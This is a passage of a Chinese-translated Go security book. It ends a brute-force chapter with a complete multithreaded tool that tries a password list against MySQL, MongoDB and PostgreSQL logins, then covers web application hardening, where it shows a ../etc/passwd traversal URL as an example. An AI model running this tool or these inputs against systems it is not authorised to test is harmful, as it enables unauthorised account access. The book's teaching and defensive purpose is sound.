这个例子结合了所有三个数据库库,并提供了一个工具,可以暴力破解 MySQL、MongoDB 或 PostgreSQL。数据库类型被指定为命令行参数之一,以及用户名、主机、密码文件和数据库名称。MongoDB 和 MySQL 不需要像 PostgreSQL 那样的数据库名称,所以在不使用postgres选项时是可选的。创建了一个名为loginFunc的特殊变量,用于存储与指定数据库类型关联的登录函数。这是我们第一次使用变量来保存一个函数。然后使用登录函数执行暴力破解攻击:

package main 

import ( 
   "database/sql" 
   "log" 
   "time" 

   // Underscore means only import for 
   // the initialization effects. 
   // Without it, Go will throw an 
   // unused import error since the mysql+postgres 
   // import only registers a database driver 
   // and we use the generic sql.Open() 
   "bufio" 
   "fmt" 
   _ "github.com/go-sql-driver/mysql" 
   _ "github.com/lib/pq" 
   "gopkg.in/mgo.v2" 
   "os" 
) 

// Define these at the package level since they don't change, 
// so we don't have to pass them around between functions 
var ( 
   username string 
   // Note that some databases like MySQL and Mongo 
   // let you connect without specifying a database name 
   // and the value will be omitted when possible 
   dbName        string 
   host          string 
   dbType        string 
   passwordFile  string 
   loginFunc     func(string) 
   doneChannel   chan bool 
   activeThreads = 0 
   maxThreads    = 10 
) 

func loginPostgres(password string) { 
   // Create the database connection string 
   // postgres://username:password@host/database 
   connStr := "postgres://" 
   connStr += username + ":" + password 
   connStr += "@" + host + "/" + dbName 

   // Open does not create database connection, it waits until 
   // a query is performed 
   db, err := sql.Open("postgres", connStr) 
   if err != nil { 
      log.Println("Error with connection string. ", err) 
   } 

   // Ping will cause database to connect and test credentials 
   err = db.Ping() 
   if err == nil { // No error = success 
      exitWithSuccess(password) 
   } else { 
      // The error is likely just an access denied, 
      // but we print out the error just in case it 
      // is a connection issue that we need to fix 
      log.Println("Error authenticating with Postgres. ", err) 
   } 
   doneChannel <- true 
} 

func loginMysql(password string) { 
   // Create database connection string 
   // user:password@tcp(host)/database?charset=utf8 
   // The database name is not required for a MySQL 
   // connection so we leave it off here. 
   // A user may have access to multiple databases or 
   // maybe we do not know any database names 
   connStr := username + ":" + password 
   connStr += "@tcp(" + host + ")/" // + dbName 
   connStr += "?charset=utf8" 

   // Open does not create database connection, it waits until 
   // a query is performed 
   db, err := sql.Open("mysql", connStr) 
   if err != nil { 
      log.Println("Error with connection string. ", err) 
   } 

   // Ping will cause database to connect and test credentials 
   err = db.Ping() 
   if err == nil { // No error = success 
      exitWithSuccess(password) 
   } else { 
      // The error is likely just an access denied, 
      // but we print out the error just in case it 
      // is a connection issue that we need to fix 
      log.Println("Error authenticating with MySQL. ", err) 
   } 
   doneChannel <- true 
} 

func loginMongo(password string) { 
   // Define Mongo connection info 
   // mgo does not use the Go sql driver like the others 
   mongoDBDialInfo := &mgo.DialInfo{ 
      Addrs:   []string{host}, 
      Timeout: 10 * time.Second, 
      // Mongo does not require a database name 
      // so it is omitted to improve auth chances 
      //Database: dbName, 
      Username: username, 
      Password: password, 
   } 
   _, err := mgo.DialWithInfo(mongoDBDialInfo) 
   if err == nil { // No error = success 
      exitWithSuccess(password) 
   } else { 
      log.Println("Error connecting to Mongo. ", err) 
   } 
   doneChannel <- true 
} 

func exitWithSuccess(password string) { 
   log.Println("Success!") 
   log.Printf("\nUser: %s\nPass: %s\n", username, password) 
   os.Exit(0) 
} 

func bruteForce() { 
   // Load password file 
   passwords, err := os.Open(passwordFile) 
   if err != nil { 
      log.Fatal("Error opening password file. ", err) 
   } 

   // Go through each password, line-by-line 
   scanner := bufio.NewScanner(passwords) 
   for scanner.Scan() { 
      password := scanner.Text() 

      // Limit max goroutines 
      if activeThreads >= maxThreads { 
         <-doneChannel // Wait 
         activeThreads -= 1 
      } 

      // Test the login using the specified login function 
      go loginFunc(password) 
      activeThreads++ 
   } 

   // Wait for all threads before returning 
   for activeThreads > 0 { 
      <-doneChannel 
      activeThreads -= 1 
   } 
} 

func checkArgs() (string, string, string, string, string) { 
   // Since the database name is not required for Mongo or Mysql 
   // Just set the dbName arg to anything. 
   if len(os.Args) == 5 && 
      (os.Args[1] == "mysql" || os.Args[1] == "mongo") { 
      return os.Args[1], os.Args[2], os.Args[3], os.Args[4],   
      "IGNORED" 
   } 
   // Otherwise, expect all arguments. 
   if len(os.Args) != 6 { 
      printUsage() 
      os.Exit(1) 
   } 
   return os.Args[1], os.Args[2], os.Args[3], os.Args[4], os.Args[5] 
} 

func printUsage() { 
   fmt.Println(os.Args[0] + ` - Brute force database login  

Attempts to brute force a database login for a specific user with  
a password list. Database name is ignored for MySQL and Mongo, 
any value can be provided, or it can be omitted. Password file 
should contain passwords separated by a newline. 

Database types supported: mongo, mysql, postgres 

Usage: 
  ` + os.Args[0] + ` (mysql|postgres|mongo) <pwFile>` +
     ` <user> <host>[:port] <dbName> 

Examples: 
  ` + os.Args[0] + ` postgres passwords.txt nanodano` +
      ` localhost:5432  myDb   
  ` + os.Args[0] + ` mongo passwords.txt nanodano localhost 
  ` + os.Args[0] + ` mysql passwords.txt nanodano localhost`) 
} 

func main() { 
   dbType, passwordFile, username, host, dbName = checkArgs() 

   switch dbType { 
   case "mongo": 
       loginFunc = loginMongo 
   case "postgres": 
       loginFunc = loginPostgres 
   case "mysql": 
       loginFunc = loginMysql 
   default: 
       fmt.Println("Unknown database type: " + dbType) 
       fmt.Println("Expected: mongo, postgres, or mysql") 
       os.Exit(1) 
   } 

   doneChannel = make(chan bool) 
   bruteForce() 
} 

摘要

阅读完本章后,您现在将了解基本的暴力破解攻击如何针对不同的应用程序工作。您应该能够根据自己的需求调整这里给出的示例来攻击不同的协议。

请记住,这些例子可能是危险的,可能会导致拒绝服务,并且不建议您对生产服务运行它们,除非是为了测试您的暴力破解防护措施。只对您控制的服务执行这些测试,获得测试权限并了解后果。您不应该对您不拥有的服务使用这些例子或这些类型的攻击,否则您可能会触犯法律并陷入严重的法律问题。

对于测试来说,有一些细微的法律界限可能很难区分。例如,如果您租用硬件设备,您在技术上并不拥有它,并且需要获得许可才能对其进行测试,即使它位于您的数据中心。同样,如果您从亚马逊等提供商那里租用托管服务,您必须在执行渗透测试之前获得他们的许可,否则您可能会因违反服务条款而遭受后果。

在下一章中,我们将研究使用 Go 的 Web 应用程序以及如何通过使用最佳实践来增强它们的安全性,如 HTTPS、使用安全的 cookie 和安全的 HTTP 头部、转义 HTML 输出和添加日志。它还探讨了如何作为客户端消耗 Web 应用程序,通过发出请求、使用客户端 SSL 证书和使用代理。

第九章:Web 应用程序

Go 在标准库中有一个强大的 HTTP 包。net/http包的文档位于golang.org/pkg/net/http/,包含了 HTTP 和 HTTPS 的实用工具。起初,我建议你远离社区的 HTTP 框架,坚持使用 Go 标准库。标准的 HTTP 包包括了用于监听、路由和模板的函数。内置的 HTTP 服务器具有生产质量,并直接绑定到端口,消除了需要单独的 httpd,如 Apache、IIS 或 nginx。然而,通常会看到 nginx 监听公共端口80,并将所有请求反向代理到监听本地端口而不是80的 Go 服务器。

在本章中,我们涵盖了运行 HTTP 服务器的基础知识,使用 HTTPS,设置安全的 cookies,以及转义输出。我们还介绍了如何使用 Negroni 中间件包,并实现用于记录、添加安全的 HTTP 头和提供静态文件的自定义中间件。Negroni 采用了 Go 的成熟方法,并鼓励使用标准库net/http处理程序。它非常轻量级,并建立在现有的 Go 结构之上。此外,还提到了与运行 Web 应用程序相关的其他最佳实践。

还提供了 HTTP 客户端的示例。从进行基本的 HTTP 请求开始,我们继续进行 HTTPS 请求,并使用客户端证书进行身份验证和代理路由流量。

在本章中,我们将涵盖以下主题:

  • HTTP 服务器

  • 简单的 HTTP 服务器

  • TLS 加密的 HTTP(HTTPS)

  • 使用安全的 cookies

  • HTML 转义输出

  • Negroni 中间件

  • 记录请求

  • 添加安全的 HTTP 头

  • 提供静态文件

  • 其他最佳实践

  • 跨站请求伪造(CSRF)令牌

  • 防止用户枚举和滥用

  • 避免本地和远程文件包含漏洞

  • HTTP 客户端

  • 进行基本的 HTTP 请求

  • 使用客户端 SSL 证书

  • 使用代理

  • 使用系统代理

  • 使用 HTTP 代理

  • 使用 SOCKS5 代理(Tor)

HTTP 服务器

HTTP 是建立在 TCP 层之上的应用程序协议。概念相对简单;你可以使用纯文本来构造一个请求。在第一行,你将提供方法,比如GETPOST,以及路径和你遵循的 HTTP 版本。之后,你将提供一系列键值对来描述你的请求。通常,你需要提供一个Host值,以便服务器知道你正在请求哪个网站。一个简单的 HTTP 请求可能是这样的:

GET /archive HTTP/1.1
Host: www.devdungeon.com  

不过,你不需要担心 HTTP 规范中的所有细节。Go 提供了一个net/http包,其中包含了几个工具,可以轻松地创建生产就绪的 Web 服务器,包括对 HTTP/2.0 的支持,Go 1.6 及更新版本。本节涵盖了与运行和保护 HTTP 服务器相关的主题。

简单的 HTTP 服务器

在这个例子中,一个 HTTP 服务器演示了使用标准库创建一个监听服务器是多么简单。目前还没有路由或多路复用。在这种情况下,通过服务器提供了一个特定的目录。http.FileServer()内置了目录列表,所以如果你对/发出 HTTP 请求,它将列出目录中可用的文件:

package main

import (
   "fmt"
   "log"
   "net/http"
   "os"
)

func printUsage() {
   fmt.Println(os.Args[0] + ` - Serve a directory via HTTP

URL should include protocol IP or hostname and port separated by colon.

Usage:
  ` + os.Args[0] + ` <listenUrl> <directory>

Example:
  ` + os.Args[0] + ` localhost:8080 .
  ` + os.Args[0] + ` 0.0.0.0:9999 /home/nanodano
`)
}

func checkArgs() (string, string) {
   if len(os.Args) != 3 {
      printUsage()
      os.Exit(1)
   }
   return os.Args[1], os.Args[2]
}

func main() {
   listenUrl, directoryPath := checkArgs()
   err := http.ListenAndServe(listenUrl,      
     http.FileServer(http.Dir(directoryPath)))
   if err != nil {
      log.Fatal("Error running server. ", err)
   }
}

下一个示例显示了如何路由路径并创建一个处理传入请求的函数。这个示例不接受任何命令行参数,因为它本身并不是一个很有用的程序,但你可以将其用作基本模板:

package main

import (
   "fmt"
   "net/http"
   "log"
)

func indexHandler(writer http.ResponseWriter, request *http.Request) {
   // Write the contents of the response body to the writer interface
   // Request object contains information about and from the client
   fmt.Fprintf(writer, "You requested: " + request.URL.Path)
}

func main() {
   http.HandleFunc("/", indexHandler)
   err := http.ListenAndServe("localhost:8080", nil)
   if err != nil {
      log.Fatal("Error creating server. ", err)
   }
}

HTTP 基本认证

HTTP 基本认证通过取用户名和密码,用冒号分隔符组合它们,并使用 base64 进行编码来实现。用户名和密码通常可以作为 URL 的一部分传递,例如:http://<username>:<password>@www.example.com。在底层,实际发生的是用户名和密码被组合、编码,并作为 HTTP 头传递。

如果您使用这种身份验证方法,请记住它是不加密的。在传输过程中,用户名和密码没有任何保护。您始终希望在传输层上使用加密,这意味着添加 TLS/SSL。

如今,HTTP 基本身份验证并不常用,但它很容易实现。更常见的方法是在应用程序中构建或使用自己的身份验证层,例如将用户名和密码与一个充满了盐和哈希密码的用户数据库进行比较。

有关创建需要 HTTP 基本身份验证的 HTTP 服务器的客户端示例,请参阅第八章 暴力破解。Go 标准库仅提供了 HTTP 基本身份验证的客户端方法。它不提供服务器端检查基本身份验证的方法。

我不建议您在服务器上实现 HTTP 基本身份验证。如果需要对客户端进行身份验证,请使用 TLS 证书。

使用 HTTPS

在第六章 密码学中,我们向您介绍了生成密钥并创建自签名证书所需的步骤。我们还为您提供了如何运行 TCP 套接字级别的 TLS 服务器的示例。本节将演示如何创建一个 TLS 加密的 HTTP 服务器或 HTTPS 服务器。

TLS 是 SSL 的更新版本,Go 有一个很好地支持它的标准包。您需要一个使用该密钥生成的私钥和签名证书。您可以使用自签名证书或由公认的证书颁发机构签名的证书。从历史上看,由受信任的机构签名的 SSL 证书总是需要花钱的,但letsencrypt.org/改变了这一局面,他们开始提供由广泛信任的机构签名的免费和自动化证书。

如果您需要一个证书(cert.pem)的示例,请参考第六章 密码学中的创建自签名证书的示例。

以下代码演示了如何运行一个提供单个网页的 HTTPS 服务器的最基本示例。有关各种 HTTP 蜜罐示例和更多 HTTP 服务器参考代码,请参考第十章 网络爬虫中的示例。在源代码中初始化 HTTPS 服务器后,您可以像处理 HTTP 服务器对象一样处理它。请注意,这与 HTTP 服务器之间的唯一区别是您需要调用http.ListenAndServeTLS()而不是http.ListenAndServe()。此外,您必须为服务器提供证书和密钥:

package main

import (
   "fmt"
   "net/http"
   "log"
)

func indexHandler(writer http.ResponseWriter, request *http.Request) {
   fmt.Fprintf(writer, "You requested: "+request.URL.Path)
}

func main() {
   http.HandleFunc("/", indexHandler)
   err := http.ListenAndServeTLS( 
      "localhost:8181", 
      "cert.pem", 
      "privateKey.pem", 
      nil, 
   )
   if err != nil {
      log.Fatal("Error creating server. ", err)
   }
}

创建安全 cookie

Cookies 本身不应包含用户无法查看的敏感信息。攻击者可以针对 cookie 进行攻击,试图收集私人信息。最常见的目标是会话 cookie。如果会话 cookie 受到损害,攻击者可以使用该 cookie 冒充用户,服务器将允许这种行为。

HttpOnly标志要求浏览器阻止 JavaScript 访问 cookie,以防止跨站脚本攻击。只有在进行 HTTP 请求时才会发送 cookie。如果确实需要通过 JavaScript 访问 cookie,只需创建一个与会话 cookie 不同的 cookie。

Secure标志要求浏览器仅在 TLS/SSL 加密下传输 cookie。这可以防止通过嗅探公共未加密的 Wi-Fi 网络或中间人连接进行的会话劫持尝试。一些网站只会在登录页面上使用 SSL 来保护您的密码,但之后的每次连接都是通过普通 HTTP 进行的,会话 cookie 可以在传输过程中被窃取,或者在缺少HttpOnly标志的情况下,可能会被 JavaScript 窃取。

创建会话令牌时,请确保使用加密安全的伪随机数生成器生成它。会话令牌的长度应至少为 128 位。请参阅第六章,密码学,了解生成安全随机字节的示例。

以下示例创建了一个简单的 HTTP 服务器,只有一个函数indexHandler()。该函数使用推荐的安全设置创建一个 cookie,然后在打印响应正文并返回之前调用http.SetCookie()

package main

import (
   "fmt"
   "net/http"
   "log"
   "time"
)

func indexHandler(writer http.ResponseWriter, request *http.Request) {
   secureSessionCookie := http.Cookie {
      Name: "SessionID",
      Value: "<secure32ByteToken>",
      Domain: "yourdomain.com",
      Path: "/",
      Expires: time.Now().Add(60 * time.Minute),
      HttpOnly: true, // Prevents JavaScript from accessing
      Secure: true, // Requires HTTPS
   }   
   // Write cookie header to response
   http.SetCookie(writer, &secureSessionCookie)   
   fmt.Fprintln(writer, "Cookie has been set.")
}

func main() {
   http.HandleFunc("/", indexHandler)
   err := http.ListenAndServe("localhost:8080", nil)
   if err != nil {
      log.Fatal("Error creating server. ", err)
   }
}

HTML 转义输出

Go 语言有一个标准函数用于转义字符串,防止 HTML 字符被渲染。

在输出用户接收到的任何数据到响应输出时,始终对其进行转义,以防止跨站脚本攻击。无论用户提供的数据来自 URL 查询、POST 值、用户代理标头、表单、cookie 还是数据库,都适用这一规则。以下代码片段给出了转义字符串的示例:

package main

import (
   "fmt"
   "html"
)

func main() {
   rawString := `<script>alert("Test");</script>`
   safeString := html.EscapeString(rawString)

   fmt.Println("Unescaped: " + rawString)
   fmt.Println("Escaped: " + safeString)
}

Negroni 中间件

中间件是指可以绑定到请求/响应流程并在传递给下一个中间件并最终返回给客户端之前采取行动或进行修改的函数。

中间件是按顺序在每个请求上运行的一系列函数。您可以向此链中添加更多函数。我们将看一些实际的例子,比如列入黑名单的 IP 地址、添加日志记录和添加授权检查。

中间件的顺序很重要。例如,我们可能希望先放日志记录中间件,然后是 IP 黑名单中间件。我们希望 IP 黑名单模块首先运行,或者至少在开始附近运行,这样其他中间件不会浪费资源处理一个将被拒绝的请求。您可以在将请求和响应传递给下一个中间件处理程序之前操纵它们。

您可能还想构建自定义中间件来进行分析、日志记录、列入黑名单的 IP 地址、注入标头,或拒绝某些用户代理,比如curlpythongo

这些示例使用了 Negroni 包。在编译和运行这些示例之前,您需要go get该包。这些示例调用了http.ListenAndServe(),但您也可以很容易地修改它们以使用http.ListenAndServeTLS()来使用 TLS:

go get github.com/urfave/negroni 

以下示例创建了一个customMiddlewareHandler()函数,我们将告诉negroniHandler接口使用它。自定义中间件只是简单地记录传入的请求 URL 和用户代理,但您可以做任何您喜欢的事情,包括修改请求再返回给客户端:

package main

import (
   "fmt"
   "log"
   "net/http"

   "github.com/urfave/negroni"
)

// Custom middleware handler logs user agent
func customMiddlewareHandler(rw http.ResponseWriter, 
   r *http.Request, 
   next http.HandlerFunc, 
) {
   log.Println("Incoming request: " + r.URL.Path)
   log.Println("User agent: " + r.UserAgent())

   next(rw, r) // Pass on to next middleware handler
}

// Return response to client
func indexHandler(writer http.ResponseWriter, request *http.Request) {
   fmt.Fprintf(writer, "You requested: " + request.URL.Path)
}

func main() {
   multiplexer := http.NewServeMux()
   multiplexer.HandleFunc("/", indexHandler)

   negroniHandler := negroni.New()
   negroniHandler.Use(negroni.HandlerFunc(customMiddlewareHandler))
   negroniHandler.UseHandler(multiplexer)

   http.ListenAndServe("localhost:3000", negroniHandler)
}

记录请求

由于日志记录是如此常见的任务,Negroni 附带了一个日志记录中间件,您可以使用,如下例所示:

package main

import (
   "fmt"
   "net/http"

   "github.com/urfave/negroni"
)

// Return response to client
func indexHandler(writer http.ResponseWriter, request *http.Request) {
   fmt.Fprintf(writer, "You requested: " + request.URL.Path)
}

func main() {
   multiplexer := http.NewServeMux()
   multiplexer.HandleFunc("/", indexHandler)

   negroniHandler := negroni.New()
   negroniHandler.Use(negroni.NewLogger()) // Negroni's default logger
   negroniHandler.UseHandler(multiplexer)

   http.ListenAndServe("localhost:3000", negroniHandler)
}

添加安全的 HTTP 标头

利用 Negroni 包,我们可以轻松地创建自己的中间件来注入一组 HTTP 标头,以帮助提高安全性。您需要评估每个标头,看看它是否适合您的应用程序。此外,并非每个浏览器都支持这些标头中的每一个。这是一个很好的基线,可以根据需要进行修改。

此示例中使用了以下标头:

标头 描述
Content-Security-Policy 这定义了哪些脚本或远程主机是受信任的,并能够提供可执行的 JavaScript
X-Frame-Options 这定义了是否可以使用框架和 iframe,以及允许出现在框架中的域
X-XSS-Protection 这告诉浏览器在检测到跨站脚本攻击时停止加载;如果定义了良好的Content-Security-Policy标头,则基本上是不必要的
Strict-Transport-Security 这告诉浏览器只使用 HTTPS,而不是 HTTP
X-Content-Type-Options 这告诉浏览器使用服务器提供的 MIME 类型,而不是基于 MIME 嗅探的猜测进行修改

客户端的网络浏览器最终决定是否使用或忽略这些标头。如果浏览器不知道如何应用标头值,它们就无法保证任何安全性。

这个例子创建了一个名为addSecureHeaders()的函数,它被用作额外的中间件处理程序,以在返回给客户端之前修改响应。根据你的应用程序需要调整标头:

package main

import (
   "fmt"
   "net/http"

   "github.com/urfave/negroni"
)

// Custom middleware handler logs user agent
func addSecureHeaders(rw http.ResponseWriter, r *http.Request, 
   next http.HandlerFunc) {
   rw.Header().Add("Content-Security-Policy", "default-src 'self'")
   rw.Header().Add("X-Frame-Options", "SAMEORIGIN")
   rw.Header().Add("X-XSS-Protection", "1; mode=block")
   rw.Header().Add("Strict-Transport-Security", 
      "max-age=10000, includeSubdomains; preload")
   rw.Header().Add("X-Content-Type-Options", "nosniff")

   next(rw, r) // Pass on to next middleware handler
}

// Return response to client
func indexHandler(writer http.ResponseWriter, request *http.Request) {
   fmt.Fprintf(writer, "You requested: " + request.URL.Path)
}

func main() {
   multiplexer := http.NewServeMux()
   multiplexer.HandleFunc("/", indexHandler)

   negroniHandler := negroni.New()

   // Set up as many middleware functions as you need, in order
   negroniHandler.Use(negroni.HandlerFunc(addSecureHeaders))
   negroniHandler.Use(negroni.NewLogger())
   negroniHandler.UseHandler(multiplexer)

   http.ListenAndServe("localhost:3000", negroniHandler)
}

提供静态文件

另一个常见的 Web 服务器任务是提供静态文件。值得一提的是 Negroni 中间件处理程序用于提供静态文件。只需添加一个额外的Use()调用,并将negroni.NewStatic()传递给它。确保你的静态文件目录只包含客户端应该访问的文件。在大多数情况下,静态文件目录包含客户端的 CSS 和 JavaScript 文件。不要放置数据库备份、配置文件、SSH 密钥、Git 存储库、开发文件或任何客户端不应该访问的内容。像这样添加静态文件中间件:

negroniHandler.Use(negroni.NewStatic(http.Dir("/path/to/static/files")))  

其他最佳实践

在创建 Web 应用程序时,还有一些其他值得考虑的事项。虽然它们不是 Go 特有的,但在开发时考虑这些最佳实践是值得的。

CSRF 令牌

跨站请求伪造,或CSRF,令牌是一种试图阻止一个网站代表你对另一个网站采取行动的方式。

CSRF 是一种常见的攻击方式,受害者会访问一个嵌入了恶意代码的网站,试图向不同的网站发出请求。例如,一个恶意的行为者嵌入了 JavaScript,试图向每个银行网站发出 POST 请求,尝试将 1000 美元转账到攻击者的银行账户。如果受害者在其中一个银行有活动会话,并且该银行没有实施 CSRF 令牌,那么银行的网站可能会接受并处理该请求。

即使在受信任的网站上,也有可能成为 CSRF 攻击的受害者,如果受信任的网站容易受到反射或存储型跨站脚本攻击。自 2007 年以来,CSRF 一直是OWASP 十大中的一部分,并且在 2017 年仍然如此。

Go 提供了一个xsrftoken包,你可以在godoc.org/golang.org/x/net/xsrftoken上了解更多信息。它提供了一个Generate()函数来创建令牌,以及一个Valid()函数来验证令牌。你可以使用他们的实现,也可以选择开发适合自己需求的实现。

要实现 CSRF 令牌,创建一个 16 字节的随机令牌,并将其存储在与用户会话关联的服务器上。你可以使用任何你喜欢的后端来存储令牌,无论是在内存中、数据库中还是在文件中。将 CSRF 令牌嵌入表单作为隐藏字段。在服务器端处理表单时,验证 CSRF 令牌是否存在并与用户匹配。在使用后销毁令牌。不要重复使用相同的令牌。

在前面的章节中已经介绍了实现 CSRF 令牌的各种要求:

  • 生成令牌:在第六章中,密码学,名为密码学安全伪随机数生成器(CSPRNG)的部分提供了生成随机数、字符串和字节的示例。

  • 创建、提供和处理 HTML 表单:在第九章中,Web 应用程序,名为HTTP 服务器的部分提供了创建安全 Web 服务器的信息,而第十二章,社会工程,有一个名为HTTP POST 表单登录蜜罐的部分,其中有一个处理 POST 请求的示例。

  • 将令牌存储在文件中:在第三章中,文件操作,名为将字节写入文件的部分提供了将数据存储在文件中的示例。

  • 在数据库中存储令牌:在第八章中,暴力破解,标题为暴力破解数据库登录的部分提供了连接到各种数据库类型的蓝图。

防止用户枚举和滥用

这里需要记住的重要事项如下:

  • 不要让人们弄清楚谁有帐户

  • 不要让某人通过您的电子邮件服务器向用户发送垃圾邮件

  • 不要让人们通过暴力尝试弄清楚谁已注册

让我们详细说明一下实际例子。

注册

当有人尝试注册电子邮件地址时,不要向 Web 客户端用户提供有关帐户是否已注册的任何反馈。相反,向该地址发送一封电子邮件,并简单地向 Web 用户显示一条消息,内容是“已向提供的地址发送了一封电子邮件”。

如果他们从未注册过,一切都是正常的。如果他们已经注册,网页用户不会收到电子邮件已注册的通知。相反,将向用户的地址发送一封电子邮件,通知他们该电子邮件已经注册。这将提醒他们已经有一个帐户,他们可以使用密码重置工具,或者让他们知道有可疑的情况,可能有人在做一些恶意的事情。

要小心,不要让攻击者反复尝试登录过程并向真实用户的电子邮件发送大量邮件。

登录

不要向网页用户提供关于电子邮件是否存在的反馈。您不希望某人能够尝试使用电子邮件地址登录并通过返回的错误消息了解该地址是否有帐户。例如,攻击者可以尝试使用一系列电子邮件地址登录,如果 Web 服务器对某些电子邮件返回“密码不匹配”,对其他电子邮件返回“该电子邮件未注册”,他们可以确定哪些电子邮件已在您的服务中注册。

重置密码

避免允许电子邮件垃圾邮件。限制发送的电子邮件数量,以便攻击者无法通过多次提交忘记密码表单来向用户发送垃圾邮件。

创建重置令牌时,请确保它具有良好的熵,以便无法猜测。不要仅基于时间和用户 ID 创建令牌,因为这样太容易被猜测和暴力破解,熵不足。对于令牌,您应该使用至少 16-32 个随机字节以获得足够的熵。参考第六章,密码学,了解生成密码学安全随机字节的示例。

此外,将令牌设置为在短时间后过期。从一小时到一天不等的时间段都是不错的选择,这取决于您的应用程序。一次只允许一个重置令牌,并在使用后销毁令牌,以防止重放和再次使用。

用户配置文件

与登录页面类似,如果您有用户配置文件页面,请小心允许用户名枚举。例如,如果有人访问/users/JohnDoe,然后访问/users/JaneDoe,一个返回404 Not Found错误,另一个返回401 Access Denied错误,攻击者可以推断一个帐户实际上存在,而另一个不存在。

防止 LFI 和 RFI 滥用

本地文件包含LFI)和远程文件包含RFI)是OWASP 十大漏洞之一。它们指的是从本地文件系统或远程主机加载未经意的文件的危险,或者加载预期的文件但带有污染数据。远程文件包含是危险的,因为如果不采取预防措施,用户可能会从恶意服务器提供远程文件。

如果用户未经任何消毒就指定了文件名,则不要从本地文件系统打开文件。考虑一个示例,Web 服务器在请求时返回一个文件。用户可能能够使用这样的 URL 请求包含敏感系统信息的文件,例如/etc/passwd

http://localhost/displayFile?filename=/etc/passwd  

如果 Web 服务器处理方式如下(伪代码):

file = os.Open(request.GET['filename'])
return file.ReadAll()

您不能简单地通过在特定目录前面添加来修复它,就像这样:

os.Open('/path/to/mydir/' + GET['filename']).

这还不够,因为攻击者可以使用目录遍历返回到文件系统的根目录,就像这样:

http://localhost/displayFile?filename=../../../etc/passwd   

务必检查任何文件包含中的目录遍历攻击。

受污染的文件

如果攻击者发现了 LFI,或者您提供了一个用于查看日志文件的 Web 界面,您需要确保即使日志被污染,也不会执行任何代码。

攻击者可能会通过对服务采取某些操作来污染您的日志并插入恶意代码。任何生成的日志都必须被视为已加载或显示的服务。

例如,Web 服务器日志可能会通过向实际上是代码的 URL 发出 HTTP 请求而被污染。您的日志将显示404 Not Found错误并记录所请求的 URL,实际上是代码。如果它是 PHP 服务器或另一种脚本语言,这将打开潜在的代码执行,但是,对于 Go 来说,最坏的情况将是 JavaScript 注入,这对用户仍然可能是危险的。想象一种情况,一个 Web 应用程序有一个 HTTP 日志查看器,它从磁盘加载日志文件。如果攻击者向yourwebsite.com/<script>alert("test");</script>发出请求,那么您的 HTML 日志查看器可能实际上会渲染该代码,如果没有适当地转义或清理。

HTTP 客户端

如今,发出 HTTP 请求是许多应用程序的核心部分。作为一个友好的网络语言,Go 包含了net/http包中用于发出 HTTP 请求的几个工具。

基本的 HTTP 请求

这个例子使用了net/http标准库包中的http.Get()函数。它将把整个响应主体读取到一个名为body的变量中,然后将其打印到标准输出:

package main

import (
   "fmt"
   "io/ioutil"
   "log"
   "net/http"
)

func main() {
   // Make basic HTTP GET request
   response, err := http.Get("http://www.example.com")
   if err != nil {
      log.Fatal("Error fetching URL. ", err)
   }

   // Read body from response
   body, err := ioutil.ReadAll(response.Body)
   response.Body.Close()
   if err != nil {
      log.Fatal("Error reading response. ", err)
   }

   fmt.Printf("%s\n", body)
}

使用客户端 SSL 证书

如果远程 HTTPS 服务器具有严格的身份验证并需要受信任的客户端证书,您可以通过在http.Transport对象中设置TLSClientConfig变量来指定证书文件,该对象由http.Client用于发出 GET 请求。

这个例子发出了一个类似于上一个例子的 HTTP GET 请求,但它没有使用net/http包提供的默认 HTTP 客户端。它创建了一个自定义的http.Client并配置它以使用客户端证书的 TLS。如果您需要证书或私钥,请参考第六章,“密码学”,以获取生成密钥和自签名证书的示例:

package main

import (
   "crypto/tls"
   "log"
   "net/http"
)

func main() {
   // Load cert
   cert, err := tls.LoadX509KeyPair("cert.pem", "privKey.pem")
   if err != nil {
      log.Fatal(err)
   }

   // Configure TLS client
   tlsConfig := &tls.Config{
      Certificates: []tls.Certificate{cert},
   }
   tlsConfig.BuildNameToCertificate()
   transport := &http.Transport{ 
      TLSClientConfig: tlsConfig, 
   }
   client := &http.Client{Transport: transport}

   // Use client to make request.
   // Ignoring response, just verifying connection accepted.
   _, err = client.Get("https://example.com")
   if err != nil {
      log.Println("Error making request. ", err)
   }
}

使用代理

正向代理可以用于许多用途,包括查看 HTTP 流量、调试应用程序、逆向工程 API、操纵标头,还可以潜在地用于增加您对目标服务器的匿名性。但是,请注意,许多代理服务器仍然使用X-Forwarded-For头来转发您的原始 IP。

您可以使用环境变量设置代理,也可以在请求中明确设置代理。Go HTTP 客户端支持 HTTP、HTTPS 和 SOCKS5 代理,比如 Tor。

使用系统代理

如果通过环境变量设置了系统的 HTTP(S)代理,Go 的默认 HTTP 客户端将会遵守。Go 使用HTTP_PROXYHTTPS_PROXYNO_PROXY环境变量。小写版本也是有效的。您可以在运行进程之前设置环境变量,或者在 Go 中设置环境变量:

os.Setenv("HTTP_PROXY", "proxyIp:proxyPort")  

配置环境变量后,使用默认的 Go HTTP 客户端进行的任何 HTTP 请求都将遵守代理设置。在golang.org/pkg/net/http/#ProxyFromEnvironment上阅读更多关于默认代理设置的信息。

使用特定的 HTTP 代理

要显式设置代理 URL,忽略环境变量,请在由http.Client使用的自定义http.Transport对象中设置ProxyURL变量。以下示例创建了自定义http.Transport并指定了proxyUrlString。该示例仅具有代理的占位符值,必须替换为有效的代理。然后创建并配置了http.Client以使用带有代理的自定义传输:

package main

import (
   "io/ioutil"
   "log"
   "net/http"
   "net/url"
   "time"
)

func main() {
   proxyUrlString := "http://<proxyIp>:<proxyPort>"
   proxyUrl, err := url.Parse(proxyUrlString)
   if err != nil {
      log.Fatal("Error parsing URL. ", err)
   }

   // Set up a custom HTTP transport for client
   customTransport := &http.Transport{ 
      Proxy: http.ProxyURL(proxyUrl), 
   }
   httpClient := &http.Client{ 
      Transport: customTransport, 
      Timeout:   time.Second * 5, 
   }

   // Make request
   response, err := httpClient.Get("http://www.example.com")
   if err != nil {
      log.Fatal("Error making GET request. ", err)
   }
   defer response.Body.Close()

   // Read and print response from server
   body, err := ioutil.ReadAll(response.Body)
   if err != nil {
      log.Fatal("Error reading body of response. ", err)
   }
   log.Println(string(body))
}

使用 SOCKS5 代理(Tor)

Tor 是一项旨在保护您隐私的匿名服务。除非您充分了解所有影响,否则不要使用 Tor。在www.torproject.org上阅读有关 Tor 的更多信息。此示例演示了在进行请求时如何使用 Tor,但这同样适用于其他 SOCKS5 代理。

要使用 SOCKS5 代理,唯一需要修改的是代理的 URL 字符串。不要使用 HTTP 协议,而是使用socks5://协议前缀。

